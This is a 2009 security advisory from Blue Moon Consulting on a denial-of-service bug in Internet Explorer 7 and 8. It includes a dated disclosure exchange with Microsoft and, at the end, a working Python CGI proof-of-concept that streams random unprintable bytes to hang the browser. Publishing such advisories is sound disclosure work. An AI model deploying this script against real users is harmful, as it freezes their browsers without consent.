AOH :: HP Unsorted R :: VA3145.HTM

Remote DoS in Internet Explorer



Remote DoS in Internet Explorer
Remote DoS in Internet Explorer



BLUE MOON SECURITY ADVISORY 2009-04
==================================

:Title: Remote Denial of Service in Internet Explorer
:Severity: Moderate
:Reporter: Blue Moon Consulting
:Products: Internet Explorer 7 and 8
:Fixed in: --


Description
-----------

We could not find out the definitive description for Internet Explorer from Microsoft website. This is our own understanding of the application: Internet Explorer is a web browser.

We have discovered a remote DoS vulnerability in Internet Explorer 7 and 8. When visit a malicious page, the browser may freeze indefinitely and killing it in Task Manager is required. With IE8's default settings, killing the tab process simply launches another process and goes to the same malicious page, hence repeating the cycle. The root cause is unknown to us. We suspect that it is related to the display of unprintable characters on Windows XP, and Vista. The same problem does not occur in Windows 7.

Microsoft has classified this vulnerability as a stability (not security) issue and will be addressing it in the next version of the application.

Workaround
----------

There is no workaround.

Fix
---

This problem is to be fixed in the next version of Internet Explorer.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 `_ in notifying vendors. 

:Initial vendor contact:

March 19, 2009: Initial contact sent to secure@microsoft.com. 

:Vendor response:

  March 19, 2009: Tony replied stating the preference for PGP communication.

:Further communication:

  March 20, 2009: Technical details and PoC code were sent to Tony, in PGP MIME format.

  March 20, 2009: Tony replied with a new case identifier MSRC 9011jr and informed us of a new case manager, Jack.

  March 21, 2009: We further reported that IE 8 was affected by the same bug, in PGP MIME format.

  March 30, 2009: We asked if Microsoft had received our PoC.

  March 31, 2009: Jack confirmed the receipt, and replied that Microsoft could not reproduce the behavior of this bug.

  April 01, 2009: We clarified that we tested with IE 7, and IE 8 on Vista Business. Sent in PGP MIME format.

  April 01, 2009: Jack said the email was stripped out and asked us to resend.

  April 02, 2009: We resent the last email in plain text.

  April 03, 2009: Jack told us Microsoft only experienced temporary DoS and in no case did Internet Explorer hang indefinitely.

  April 06, 2009: We sent Jack a video clip, in PGP MIME format.

  April 06, 2009: Jack asked us to resend because the email was stripped again.

  April 07, 2009: We resent the clip in plain text to Jack.

  April 09, 2009: Jack acknowledged the receipt and let us know the bug would be fixed in the next version of Internet Explorer.

  April 09, 2009: We asked for a confirmation of bug classification.

  April 09, 2009: Jack confirmed this bug was classified as stability, instead of a security issue. We therefore decided to release this advisory to the public.

:Public disclosure: April 11, 2009

:Exploit code: The following CGI script causes IE to hang indefinitely.

::

  #!C:/python25/python
  import sys
  import random
  
  CHAR_SET = [chr(x) for x in range(0x20)]
  CHAR_SET += [chr(x) for x in range(128, 256)]
  
  def send_file():
  	l = 800000 + 4096
  	print "Content-Type: text/plain"
  	print "Content-Length: %d" % l
  	print "Cache-Control: no-cache, no-store, must-revalidate"
  	# this is not standardized, but use it anyway
  	print "Pragma: no-cache"
  	print ""
  	# bypass IE download dialog
  	sys.stdout.write("a" * 4096)
  	# print junks
  	for i in xrange(l):
  		sys.stdout.write(random.choice(CHAR_SET))
  	sys.exit()

  send_file()


Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

Cheers
-- 
Nam Nguyen
Blue Moon Consulting Co., Ltd
http://www.bluemoon.com.vn 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.